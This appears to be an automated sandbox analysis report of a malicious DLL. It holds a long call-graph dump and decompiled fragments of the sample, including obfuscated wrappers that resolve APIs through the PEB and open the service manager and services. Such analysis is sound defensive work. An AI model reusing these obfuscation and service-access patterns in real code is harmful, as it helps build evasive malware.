4482->4491 4483 388519 GetPEB 4483->4491 4484 37df52 4485 388519 GetPEB 4484->4485 4488 37df63 4485->4488 4488->4200 4490 377ff2 RtlAllocateHeap GetPEB 4490->4491 4491->4483 4491->4484 4491->4488 4491->4490 4494 388f9e 2 API calls 4491->4494 4503 3742c4 4491->4503 4507 382007 4491->4507 4511 3816af 4491->4511 4515 38d25e 4491->4515 4518 37df6f 4491->4518 4494->4491 4496 371d2d 4495->4496 4497 38aa30 GetPEB 4496->4497 4498 371d93 4497->4498 4498->4200 4500 381680 4499->4500 4501 37a42d GetPEB 4500->4501 4502 3816a7 4501->4502 4502->4200 4504 3742e2 4503->4504 4505 38aa30 GetPEB 4504->4505 4506 374335 OpenServiceW 4505->4506 4506->4491 4508 382033 4507->4508 4509 38aa30 GetPEB 4508->4509 4510 38209a 4509->4510 4510->4491 4512 3816f3 4511->4512 4513 38aa30 GetPEB 4512->4513 4514 38174d 4513->4514 4514->4491 4516 38aa30 GetPEB 4515->4516 4517 38d2c5 4516->4517 4517->4491 4519 37df8a 4518->4519 4520 38aa30 GetPEB 4519->4520 4521 37dfe1 4520->4521 4521->4491 4523 37ee1a 4522->4523 4524 38aa30 GetPEB 4523->4524 4525 37ee76 4524->4525 4525->4206 4527 38ab70 4526->4527 4528 38aa30 GetPEB 4527->4528 4529 38abc6 4528->4529 4529->4206 4538 38a8cb 4530->4538 4532 38dcf7 2 API calls 4532->4538 4533 38aa14 4536 388519 GetPEB 4533->4536 4534 37a42d GetPEB 4534->4538 4535 38aa12 4535->4215 4536->4535 4537 377ff2 2 API calls 4537->4538 4538->4532 4538->4533 4538->4534 4538->4535 4538->4537 4539 37a8b0 GetPEB 4538->4539 4596 374816 4538->4596 4539->4538 4556 38fc7c 4540->4556 4541 38ffc3 4542 388606 2 API calls 4541->4542 4543 38ffe0 4542->4543 4619 377f1d 4543->4619 4545 39003a 4548 388519 GetPEB 4545->4548 4547 38dcf7 2 API calls 4547->4556 4554 38ffb1 4548->4554 4549 377ff2 RtlAllocateHeap GetPEB 4549->4556 4551 37a42d GetPEB 4551->4556 4553 37a8b0 GetPEB 4553->4554 4554->4215 4556->4541 4556->4545 4556->4547 4556->4549 4556->4551 4556->4554 4557 37a8b0 GetPEB 4556->4557 4607 388606 4556->4607 4611 38c0c1 4556->4611 4615 37ed7e 4556->4615 4557->4556 4560 37cf7e 4558->4560 4561 388519 GetPEB 4560->4561 4565 37d58f 4560->4565 4566 37d5a6 4560->4566 4567 377ff2 2 API calls 4560->4567 4569 37ed7e GetPEB 4560->4569 4627 377735 4560->4627 4634 377e87 4560->4634 4638 38ae6d 4560->4638 4653 3770b3 4560->4653 4561->4560 4568 388519 GetPEB 4565->4568 4566->4215 4567->4560 4568->4566 4569->4560 4577 375577 4570->4577 4572 375969 4574 388519 GetPEB 4572->4574 4573 375967 4573->4215 4574->4573 4575 377ff2 2 API calls 4575->4577 4577->4572 4577->4573 4577->4575 4578 37ed7e GetPEB 4577->4578 4684 375e60 4577->4684 4690 37aefb 4577->4690 4578->4577 4580 38e406 4579->4580 4581 38f410 4580->4581 4583 38dcf7 2 API calls 4580->4583 4587 38f426 4580->4587 4590 37a8b0 GetPEB 4580->4590 4591 372b62 GetPEB 4580->4591 4593 388519 GetPEB 4580->4593 4595 379670 GetPEB 4580->4595 4700 38dac6 4580->4700 4704 3788c3 4580->4704 4708 3775fa 4580->4708 4712 38408e 4580->4712 4716 372ae4 4580->4716 4720 3909b5 4580->4720 4723 38a2e8 4580->4723 4732 372b62 4581->4732 4583->4580 4587->4215 4590->4580 4591->4580 4593->4580 4595->4580 4600 374836 4596->4600 4598 374b23 4599 38847f GetPEB 4598->4599 4601 374b21 4599->4601 4600->4598 4600->4601 4602 377ff2 2 API calls 4600->4602 4603 38847f 4600->4603 4601->4538 4602->4600 4604 3884a6 4603->4604 4605 38aa30 GetPEB 4604->4605 4606 388502 4605->4606 4606->4600 4608 38861f 4607->4608 4609 377ff2 2 API calls 4608->4609 4610 3886bc 4609->4610 4610->4556 4612 38c0e6 4611->4612 4613 37a42d GetPEB 4612->4613 4614 38c108 4613->4614 4614->4556 4616 37ed97 4615->4616 4623 387a71 4616->4623 4620 377f39 4619->4620 4621 37a42d GetPEB 4620->4621 4622 377f55 4621->4622 4622->4553 4624 387a8a 4623->4624 4625 38aa30 GetPEB 4624->4625 4626 37ee00 4625->4626 4626->4556 4630 377764 4627->4630 4628 377ff2 2 API calls 4628->4630 4629 377a10 4629->4560 4630->4628 4630->4629 4631 390e3a GetPEB 4630->4631 4632 3779f3 4630->4632 4631->4630 4660 390e3a 4632->4660 4635 377e9a 4634->4635 4636 37ed7e GetPEB 4635->4636 4637 377f16 4636->4637 4637->4560 4639 38aea5 4638->4639 4642 38baf7 4639->4642 4644 377ff2 2 API calls 4639->4644 4647 38baf5 4639->4647 4648 38dcf7 RtlAllocateHeap GetPEB 4639->4648 4649 379462 GetPEB 4639->4649 4650 388519 GetPEB 4639->4650 4652 37a8b0 GetPEB 4639->4652 4664 390b68 4639->4664 4668 387b05 4639->4668 4672 386bc6 4639->4672 4676 37a81d 4639->4676 4680 38828a 4639->4680 4643 37957d GetPEB 4642->4643 4643->4647 4644->4639 4647->4560 4648->4639 4649->4639 4650->4639 4652->4639 4654 3770dc 4653->4654 4655 385b3b GetPEB 4654->4655 4656 3774bb 4654->4656 4657 3774a7 4654->4657 4658 377ff2 2 API calls 4654->4658 4655->4654 4656->4560 4659 388519 GetPEB 4657->4659 4658->4654 4659->4656 4661 390e58 4660->4661 4662 37ed7e GetPEB 4661->4662 4663 390f24 4662->4663 4663->4629 4665 390b97 4664->4665 4666 38aa30 GetPEB 4665->4666 4667 390bfc 4666->4667 4667->4639 4669 387b37 4668->4669 4670 38aa30 GetPEB 4669->4670 4671 387b8a 4670->4671 4671->4639 4673 386bda 4672->4673 4674 38aa30 GetPEB 4673->4674 4675 386c3d 4674->4675 4675->4639 4677 37a83f 4676->4677 4678 38aa30 GetPEB 4677->4678 4679 37a89d 4678->4679 4679->4639 4681 3882a9 4680->4681 4682 38aa30 GetPEB 4681->4682 4683 388300 4682->4683 4683->4639 4685 375e82 4684->4685 4686 388519 GetPEB 4685->4686 4687 377ff2 2 API calls 4685->4687 4688 3764bd 4685->4688 4689 37ca90 GetPEB 4685->4689 4686->4685 4687->4685 4688->4577 4689->4685 4693 37af1c 4690->4693 4691 38ae6d 2 API calls 4691->4693 4692 37b0b3 4696 38e274 4692->4696 4693->4691 4693->4692 4694 37b0e8 4693->4694 4694->4577 4697 38e2a0 4696->4697 4698 38aa30 GetPEB 4697->4698 4699 38e312 4698->4699 4699->4694 4701 38dae5 4700->4701 4702 38aa30 GetPEB 4701->4702 4703 38db32 4702->4703 4703->4580 4705 3788f5 4704->4705 4706 38aa30 GetPEB 4705->4706 4707 378950 4706->4707 4707->4580 4709 37762c 4708->4709 4710 38aa30 GetPEB 4709->4710 4711 377690 4710->4711 4711->4580 4713 3840b3 4712->4713 4714 38aa30 GetPEB 4713->4714 4715 384103 4714->4715 4715->4580 4717 372b04 4716->4717 4718 38aa30 GetPEB 4717->4718 4719 372b4b 4718->4719 4719->4580 4736 3794ee 4720->4736 4724 38a519 4723->4724 4726 38a634 4724->4726 4729 377ff2 RtlAllocateHeap GetPEB 4724->4729 4730 37ed7e GetPEB 4724->4730 4731 388519 GetPEB 4724->4731 4740 38c032 4724->4740 4727 38a64a 4726->4727 4728 388519 GetPEB 4726->4728 4727->4580 4728->4727 4729->4724 4730->4724 4731->4724 4733 372b77 4732->4733 4734 38aa30 GetPEB 4733->4734 4735 372bce 4734->4735 4735->4587 4737 379511 4736->4737 4738 38aa30 GetPEB 4737->4738 4739 379566 4738->4739 4739->4580 4741 38c054 4740->4741 4742 38aa30 GetPEB 4741->4742 4743 38c0ae 4742->4743 4743->4724 4745 37e262 4744->4745 4746 38aa30 GetPEB 4745->4746 4747 37e2c1 4746->4747 4747->4222 4749 379623 4748->4749 4766 388315 4749->4766 4755 3911d1 4752->4755 4753 38dcf7 2 API calls 4753->4755 4754 381652 GetPEB 4754->4755 4755->4753 4755->4754 4756 377ff2 2 API calls 4755->4756 4757 37a8b0 GetPEB 4755->4757 4758 391380 4755->4758 4761 391391 4755->4761 4853 387ba6 4755->4853 4756->4755 4757->4755 4760 388519 GetPEB 4758->4760 4760->4761 4761->4229 4763 3792c1 4762->4763 4764 3792ac 4762->4764 4763->4229 4764->4763 4765 388519 GetPEB 4764->4765 4765->4764 4772 38832d 4766->4772 4768 38845c 4771 388519 GetPEB 4768->4771 4770 37966a 4770->4229 4771->4770 4772->4768 4772->4770 4773 377ff2 2 API calls 4772->4773 4775 37bb7e 4772->4775 4792 374bc7 4772->4792 4797 38907f 4772->4797 4773->4772 4791 37c63d 4775->4791 4779 38dcf7 RtlAllocateHeap GetPEB 4779->4791 4780 37ca5b 4781 37957d GetPEB 4780->4781 4783 37ca59 4781->4783 4782 37a958 GetPEB 4782->4791 4783->4772 4786 379462 GetPEB 4786->4791 4788 37a8b0 GetPEB 4788->4791 4789 37ed7e GetPEB 4789->4791 4791->4779 4791->4780 4791->4782 4791->4783 4791->4786 4791->4788 4791->4789 4806 37aa4d 4791->4806 4810 37b144 4791->4810 4814 371c45 4791->4814 4818 384624 4791->4818 4822 3792c7 4791->4822 4826 38ca69 4791->4826 4830 372bd9 4791->4830 4793 38ca69 GetPEB 4792->4793 4794 374c44 4793->4794 4795 388519 GetPEB 4794->4795 4796 374c57 4795->4796 4796->4772 4805 38947b 4797->4805 4798 38dcf7 RtlAllocateHeap GetPEB 4798->4805 4799 3895cb 4800 37957d GetPEB 4799->4800 4801 3895c9 4800->4801 4801->4772 4802 37aa4d GetPEB 4802->4805 4803 37a8b0 GetPEB 4803->4805 4804 379462 GetPEB 4804->4805 4805->4798 4805->4799 4805->4801 4805->4802 4805->4803 4805->4804 4807 37aa76 4806->4807 4808 38aa30 GetPEB 4807->4808 4809 37aab9 4808->4809 4809->4791 4811 37b15f 4810->4811 4812 38aa30 GetPEB 4811->4812 4813 37b1b8 4812->4813 4813->4791 4815 371c76 4814->4815 4816 38aa30 GetPEB 4815->4816 4817 371cd0 4816->4817 4817->4791 4819 384646 4818->4819 4820 38aa30 GetPEB 4819->4820 4821 3846a8 4820->4821 4821->4791 4823 3792e5 4822->4823 4824 38aa30 GetPEB 4823->4824 4825 37933c 4824->4825 4825->4791 4827 38ca7b 4826->4827 4828 38aa30 GetPEB 4827->4828 4829 38cad4 4828->4829 4829->4791 4831 373757 4830->4831 4832 373a7d 4831->4832 4833 377ff2 2 API calls 4831->4833 4834 388519 GetPEB 4831->4834 4836 373bbb 4831->4836 4838 37cb52 GetPEB 4831->4838 4839 379462 GetPEB 4831->4839 4840 38dcf7 RtlAllocateHeap GetPEB 4831->4840 4843 390b68 GetPEB 4831->4843 4844 37a8b0 GetPEB 4831->4844 4845 38d84c 4831->4845 4849 378d13 4831->4849 4835 37957d GetPEB 4832->4835 4833->4831 4834->4831 4837 373aa2 4835->4837 4836->4836 4837->4791 4838->4831 4839->4831 4840->4831 4843->4831 4844->4831 4846 38d87f 4845->4846 4847 38aa30 GetPEB 4846->4847 4848 38d8ca 4847->4848 4848->4831 4850 378d41 4849->4850 4851 38aa30 GetPEB 4850->4851 4852 378da7 4851->4852 4852->4831 4854 387bbf 4853->4854 4855 377ff2 2 API calls 4854->4855 4856 387c88 4855->4856 4856->4755 4858 37f02e 4857->4858 4859 38aa30 GetPEB 4858->4859 4860 37f082 4859->4860 4860->4248 4862 37ab09 4861->4862 4863 38aa30 GetPEB 4862->4863 4864 37ab6d 4863->4864 4864->4248 4866 371fe3 4865->4866 4867 38aa30 GetPEB 4866->4867 4868 372045 4867->4868 4868->4248 4870 38aa30 GetPEB 4869->4870 4871 385cbb 4870->4871 4871->4258 4873 384567 4872->4873 4874 37a42d GetPEB 4873->4874 4875 384587 4874->4875 4875->4258 4881 380d2c 4876->4881 4877 380da3 4877->4271 4878 388519 GetPEB 4878->4881 4879 378dc4 GetPEB 4879->4881 4881->4877 4881->4878 4881->4879 4882 381e67 2 API calls 4881->4882 4976 389e56 4881->4976 4882->4881 4888 38144a 4883->4888 4884 3846bb 2 API calls 4884->4888 4885 381647 4885->4271 4886 38da22 GetPEB 4886->4888 4888->4884 4888->4885 4888->4886 4890 37ab87 3 API calls 4888->4890 4891 38dcf7 RtlAllocateHeap GetPEB 4888->4891 4892 3747ce GetPEB 4888->4892 4893 37a8b0 GetPEB 4888->4893 4984 37b6cf 4888->4984 4988 378969 4888->4988 4992 37ea99 4888->4992 4890->4888 4891->4888 4892->4888 4893->4888 4911 387703 4895->4911 4897 38d2ce GetPEB 4897->4911 4899 381e67 CloseHandle GetPEB 4899->4911 4901 387759 4903 37ab87 3 API calls 4901->4903 4902 38da22 GetPEB 4902->4911 4904 387789 4903->4904 4906 381e67 2 API calls 4904->4906 4912 3877d7 4904->4912 4905 37b6cf GetPEB 4905->4911 4908 3877b2 4906->4908 4907 378969 GetPEB 4907->4911 4910 381e67 2 API calls 4908->4910 4909 38dcf7 2 API calls 4909->4911 4910->4912 4911->4897 4911->4899 4911->4901 4911->4902 4911->4905 4911->4907 4911->4909 4911->4912 4913 3747ce GetPEB 4911->4913 4914 37a8b0 GetPEB 4911->4914 4915 37ea99 3 API calls 4911->4915 5003 38bb23 4911->5003 5010 373de2 4911->5010 5013 38d389 4911->5013 4912->4271 4913->4911 4914->4911 4915->4911 5043 387cdb 4916->5043 4918 37ab87 3 API calls 4934 38570e 4918->4934 4919 385b08 4922 381e67 2 API calls 4919->4922 4920 374816 2 API calls 4920->4934 4921 3846bb 2 API calls 4921->4934 4923 385b06 4922->4923 4923->4271 4924 38da22 GetPEB 4924->4934 4925 388519 GetPEB 4925->4934 4927 37cb52 GetPEB 4927->4934 4928 37b6cf GetPEB 4928->4934 4929 38dcf7 RtlAllocateHeap GetPEB 4929->4934 4931 378969 GetPEB 4931->4934 4932 38453f GetPEB 4932->4934 4933 3747ce GetPEB 4933->4934 4934->4918 4934->4919 4934->4920 4934->4921 4934->4923 4934->4924 4934->4925 4934->4927 4934->4928 4934->4929 4934->4931 4934->4932 4934->4933 4935 37a8b0 GetPEB 4934->4935 4936 37ea99 3 API calls 4934->4936 5046 38dedc 4934->5046 5052 388727 4934->5052 4935->4934 4936->4934 4947 37f696 4937->4947 4938 3846bb 2 API calls 4938->4947 4939 37f88f 4939->4271 4940 38da22 GetPEB 4940->4947 4941 37b6cf GetPEB 4941->4947 4942 378969 GetPEB 4942->4947 4943 37a8b0 GetPEB 4943->4947 4944 38dcf7 RtlAllocateHeap GetPEB 4944->4947 4945 37ab87 3 API calls 4945->4947 4946 3747ce GetPEB 4946->4947 4947->4938 4947->4939 4947->4940 4947->4941 4947->4942 4947->4943 4947->4944 4947->4945 4947->4946 4948 37ea99 3 API calls 4947->4948 4948->4947 4950 379a55 4949->4950 4951 379b65 4950->4951 4955 379b63 4950->4955 5056 3746be 4950->5056 5060 38c3a0 4950->5060 5068 377c37 4950->5068 4953 389e56 GetPEB 4951->4953 4953->4955 4955->4271 4963 381c8c 4957->4963 4958 37ab87 3 API calls 4958->4963 4959 38da22 GetPEB 4959->4963 4960 381dd2 4960->4271 4961 37b6cf GetPEB 4961->4963 4962 378969 GetPEB 4962->4963 4963->4958 4963->4959 4963->4960 4963->4961 4963->4962 4964 38dcf7 2 API calls 4963->4964 4965 3747ce GetPEB 4963->4965 4966 37a8b0 GetPEB 4963->4966 4967 37ea99 3 API calls 4963->4967 4964->4963 4965->4963 4966->4963 4967->4963 4974 37ba53 4968->4974 4969 37bb5e 4969->4271 4970 38c3a0 GetPEB 4970->4974 4971 37bb60 4972 389e56 GetPEB 4971->4972 4972->4969 4973 3746be GetPEB 4973->4974 4974->4969 4974->4970 4974->4971 4974->4973 4975 377c37 GetPEB 4974->4975 4975->4974 4977 389e69 4976->4977 4980 376bf2 4977->4980 4981 376c0c 4980->4981 4982 38aa30 GetPEB 4981->4982 4983 376c8f 4982->4983 4983->4881 4985 37b6e5 4984->4985 4986 38aa30 GetPEB 4985->4986 4987 37b742 4986->4987 4987->4888 4989 378980 4988->4989 4990 38d25e GetPEB 4989->4990 4991 378a5d 4990->4991 4991->4888 4997 37eab9 4992->4997 4993 37ecec 4993->4888 4994 378f65 2 API calls 4994->4997 4995 37ecd6 4998 381e67 2 API calls 4995->4998 4997->4993 4997->4994 4997->4995 4999 3719b8 4997->4999 4998->4993 5000 3719dd 4999->5000 5001 38aa30 GetPEB 5000->5001 5002 371a3f 5001->5002 5002->4997 5007 38bb48 5003->5007 5004 381e67 2 API calls 5004->5007 5006 38be1d 5006->4911 5007->5004 5007->5006 5009 373de2 GetPEB 5007->5009 5023 390ac8 5007->5023 5027 38d8ec 5007->5027 5009->5007 5011 38aa30 GetPEB 5010->5011 5012 373e36 5011->5012 5012->4911 5020 38d3c3 5013->5020 5015 38d82d 5039 389008 5015->5039 5017 38d82b 5017->4911 5018 374b61 GetPEB 5018->5020 5019 38dcf7 2 API calls 5019->5020 5020->5015 5020->5017 5020->5018 5020->5019 5022 37a8b0 GetPEB 5020->5022 5031 38de10 5020->5031 5035 374241 5020->5035 5022->5020 5024 390af2 5023->5024 5025 38aa30 GetPEB 5024->5025 5026 390b4e 5025->5026 5026->5007 5028 38d8ff 5027->5028 5029 38aa30 GetPEB 5028->5029 5030 38d96e 5029->5030 5030->5007 5032 38de56 5031->5032 5033 38aa30 GetPEB 5032->5033 5034 38deba 5033->5034 5034->5020 5036 374257 5035->5036 5037 38aa30 GetPEB 5036->5037 5038 3742b3 5037->5038 5038->5020 5040 38901a 5039->5040 5041 38aa30 GetPEB 5040->5041 5042 389074 5041->5042 5042->5017 5044 38aa30 GetPEB 5043->5044 5045 387d3e 5044->5045 5045->4934 5049 38df09 5046->5049 5047 38e1a5 5050 390e3a GetPEB 5047->5050 5048 38e1a3 5048->4934 5049->5047 5049->5048 5051 377ff2 2 API calls 5049->5051 5050->5048 5051->5049 5053 388758 5052->5053 5054 38aa30 GetPEB 5053->5054 5055 3887b7 5054->5055 5055->4934 5057 3746e5 5056->5057 5058 38aa30 GetPEB 5057->5058 5059 374737 5058->5059 5059->4950 5061 38c3bc 5060->5061 5062 38c627 5061->5062 5073 37a3a3 5061->5073 5062->4950 5065 37ed7e GetPEB 5066 38c5e2 5065->5066 5066->5062 5067 37ed7e GetPEB 5066->5067 5067->5066 5071 377c52 5068->5071 5069 377df1 5069->4950 5070 38cadf GetPEB 5070->5071 5071->5069 5071->5070 5077 376ca0 5071->5077 5074 37a3c0 5073->5074 5075 38aa30 GetPEB 5074->5075 5076 37a41a 5075->5076 5076->5062 5076->5065 5078 376cb8 5077->5078 5079 38aa30 GetPEB 5078->5079 5080 376d15 5079->5080 5080->5071 5082 37a9e6 5081->5082 5083 38aa30 GetPEB 5082->5083 5084 37aa3f 5083->5084 5084->4287 5086 378ee7 5085->5086 5087 38aa30 GetPEB 5086->5087 5088 378f54 5087->5088 5088->4287 5092 37435e 5089->5092 5090 377ff2 2 API calls 5090->5092 5091 37ae64 GetPEB 5091->5092 5092->5090 5092->5091 5093 37457c 5092->5093 5094 3745a6 5092->5094 5100 37ae64 5093->5100 5094->4287 5097 374e8f 5096->5097 5098 38aa30 GetPEB 5097->5098 5099 374ed7 5098->5099 5099->4287 5101 37ae8b 5100->5101 5102 38aa30 GetPEB 5101->5102 5103 37aee2 5102->5103 5103->5094 5108 38001b 5104->5108 5105 388606 2 API calls 5105->5108 5108->5105 5109 38031b 5108->5109 5111 37a8b0 GetPEB 5108->5111 5112 37cd29 5108->5112 5116 37ee81 5108->5116 5121 372206 5108->5121 5109->4291 5111->5108 5113 37cd3f 5112->5113 5114 38aa30 GetPEB 5113->5114 5115 37cd9f 5114->5115 5115->5108 5125 388f15 5116->5125 5118 37eff7 5118->5108 5122 37222a 5121->5122 5123 37a42d GetPEB 5122->5123 5124 372249 5123->5124 5124->5108 5126 388f34 5125->5126 5127 38aa30 GetPEB 5126->5127 5128 37efa8 5127->5128 5128->5118 5129 38db43 5128->5129 5130 38db6c 5129->5130 5131 38aa30 GetPEB 5130->5131 5132 38dbd4 5131->5132 5132->5118 5134 377b13 5133->5134 5135 38aa30 GetPEB 5134->5135 5136 377b7c 5135->5136 5136->4300 5138 388b6f 5137->5138 5139 38aa30 GetPEB 5138->5139 5140 388bd5 5139->5140 5140->4132 5144 379df5 5141->5144 5143 37a305 5143->4322 5144->5143 5146 38dcf7 RtlAllocateHeap GetPEB 5144->5146 5147 37a918 GetPEB 5144->5147 5149 3747ce GetPEB 5144->5149 5150 37a8b0 GetPEB 5144->5150 5151 379dcf 2 API calls 5144->5151 5152 374635 5144->5152 5156 377e00 5144->5156 5160 378abf 5144->5160 5146->5144 5147->5144 5149->5144 5150->5144 5151->5144 5153 37464b 5152->5153 5154 38aa30 GetPEB 5153->5154 5155 3746b0 5154->5155 5155->5144 5157 377e18 5156->5157 5158 38aa30 GetPEB 5157->5158 5159 377e79 5158->5159 5159->5144 5161 378ad1 5160->5161 5162 38aa30 GetPEB 5161->5162 5163 378b32 5162->5163 5163->5144 5175 37e2cc 5164->5175 5168 379ba6 5167->5168 5198 3791dd 5168->5198 5173 381e67 2 API calls 5174 379d26 5173->5174 5174->4331 5183 37e2f1 5175->5183 5179 37e4ef 5182 381e67 2 API calls 5179->5182 5181 375357 5181->4331 5182->5181 5183->5179 5183->5181 5184 375988 5183->5184 5187 378e4d 5183->5187 5190 38c15d 5183->5190 5194 372a58 5183->5194 5185 38aa30 GetPEB 5184->5185 5186 3759db 5185->5186 5186->5183 5188 385c73 GetPEB 5187->5188 5189 378eb3 5188->5189 5189->5183 5191 38c176 5190->5191 5192 38aa30 GetPEB 5191->5192 5193 38c1de 5192->5193 5193->5183 5195 372a71 5194->5195 5196 38aa30 GetPEB 5195->5196 5197 372ad6 5196->5197 5197->5183 5199 38aa30 GetPEB 5198->5199 5200 37923b 5199->5200 5200->5174 5201 3776aa 5200->5201 5202 3776cd 5201->5202 5203 38aa30 GetPEB 5202->5203 5204 377723 5203->5204 5204->5173 5206 38e365 5205->5206 5207 37a42d GetPEB 5206->5207 5208 38e38d 5207->5208 5208->4341 5211 37410d 5209->5211 5212 37421e 5211->5212 5213 38dcf7 2 API calls 5211->5213 5215 37aad6 GetPEB 5211->5215 5216 37421c 5211->5216 5217 37a8b0 GetPEB 5211->5217 5229 371f53 5211->5229 5214 371fd1 GetPEB 5212->5214 5213->5211 5214->5216 5215->5211 5216->4364 5217->5211 5219 386c65 5218->5219 5220 374b61 GetPEB 5219->5220 5221 386d92 5219->5221 5223 386db0 5219->5223 5237 379d31 5219->5237 5220->5219 5233 386637 5221->5233 5223->4364 5226 37b1db 5225->5226 5227 38aa30 GetPEB 5226->5227 5228 37b231 5227->5228 5228->4353 5230 371f6f 5229->5230 5231 38aa30 GetPEB 5230->5231 5232 371fc3 5231->5232 5232->5211 5234 386659 5233->5234 5235 38aa30 GetPEB 5234->5235 5236 3866b7 5235->5236 5236->5223 5238 379d52 5237->5238 5239 38aa30 GetPEB 5238->5239 5240 379dc1 5239->5240 5240->5219 5279 374c5d 5280 374d8d 5279->5280 5281 388606 2 API calls 5280->5281 5286 374dd2 5280->5286 5282 374da8 5281->5282 5287 37cbdf 5282->5287 5285 37a8b0 GetPEB 5285->5286 5288 37cbfb 5287->5288 5289 374dbc 5288->5289 5291 384011 5288->5291 5289->5285 5292 384026 5291->5292 5293 38aa30 GetPEB 5292->5293 5294 384078 5293->5294 5294->5288 5295 380a96 5297 380aa6 5295->5297 5298 384087 GetPEB 5295->5298 5298->5297

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 0037912C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 250 37912c-3791af call 3820b9 call 38aa30 OpenSCManagerW
                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                            			E0037912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t32;
				signed int _t34;
				int _t43;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t43 = __ecx;
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E003820B9(_t24);
				_v12 = 0x4657ea;
				_t34 = 0x1b;
				_v12 = _v12 / _t34;
				_v12 = _v12 ^ 0x000ac4f3;
				_v8 = 0xb5c996;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x19;
				_v8 = _v8 + 0x3329;
				_v8 = _v8 ^ 0x01161fa0;
				E0038AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
				_t32 = OpenSCManagerW(0, 0, _t43); // executed
				return _t32;
			}









                                                                                                                                                            0x0037912f
                                                                                                                                                            0x00379130
                                                                                                                                                            0x00379133
                                                                                                                                                            0x00379138
                                                                                                                                                            0x0037913a
                                                                                                                                                            0x0037913d
                                                                                                                                                            0x0037913e
                                                                                                                                                            0x00379141
                                                                                                                                                            0x00379143
                                                                                                                                                            0x00379144
                                                                                                                                                            0x00379149
                                                                                                                                                            0x0037915a
                                                                                                                                                            0x00379162
                                                                                                                                                            0x0037916a
                                                                                                                                                            0x00379171
                                                                                                                                                            0x00379178
                                                                                                                                                            0x00379186
                                                                                                                                                            0x00379189
                                                                                                                                                            0x00379190
                                                                                                                                                            0x0037919d
                                                                                                                                                            0x003791a8
                                                                                                                                                            0x003791af

                                                                                                                                                            APIs
                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 003791A8
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ManagerOpen
                                                                                                                                                            • String ID: WF
                                                                                                                                                            • API String ID: 1889721586-2390014890
                                                                                                                                                            • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                                            • Instruction ID: 437d72c7bcf249edf535265df31f9fbf7eb2bffd28cb1e74599ec71f23f504ee
                                                                                                                                                            • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                                            • Instruction Fuzzy Hash: 27016971901208FBEB09DB95DD4ACAFBFB8EBC5714F108099F404A7200D3B55F109BA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003742C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39serviceCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 255 3742c4-374345 call 3820b9 call 38aa30 OpenServiceW
                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                            			E003742C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t34 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t24);
				_v8 = 0x971c9e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xbdaa;
				_v8 = _v8 | 0x44f2c0c3;
				_v8 = _v8 ^ 0x44fb9439;
				_v12 = 0x762558;
				_v12 = _v12 | 0xdc63e739;
				_v12 = _v12 ^ 0xdc7b8d87;
				E0038AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
				return _t29;
			}








                                                                                                                                                            0x003742c7
                                                                                                                                                            0x003742c8
                                                                                                                                                            0x003742ca
                                                                                                                                                            0x003742cd
                                                                                                                                                            0x003742cf
                                                                                                                                                            0x003742d2
                                                                                                                                                            0x003742d5
                                                                                                                                                            0x003742d8
                                                                                                                                                            0x003742db
                                                                                                                                                            0x003742dc
                                                                                                                                                            0x003742dd
                                                                                                                                                            0x003742e2
                                                                                                                                                            0x003742ec
                                                                                                                                                            0x003742f5
                                                                                                                                                            0x003742fc
                                                                                                                                                            0x00374303
                                                                                                                                                            0x0037430a
                                                                                                                                                            0x00374311
                                                                                                                                                            0x00374318
                                                                                                                                                            0x00374330
                                                                                                                                                            0x0037433f
                                                                                                                                                            0x00374345

                                                                                                                                                            APIs
                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00384A8F,?,?,2635DC09), ref: 0037433F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
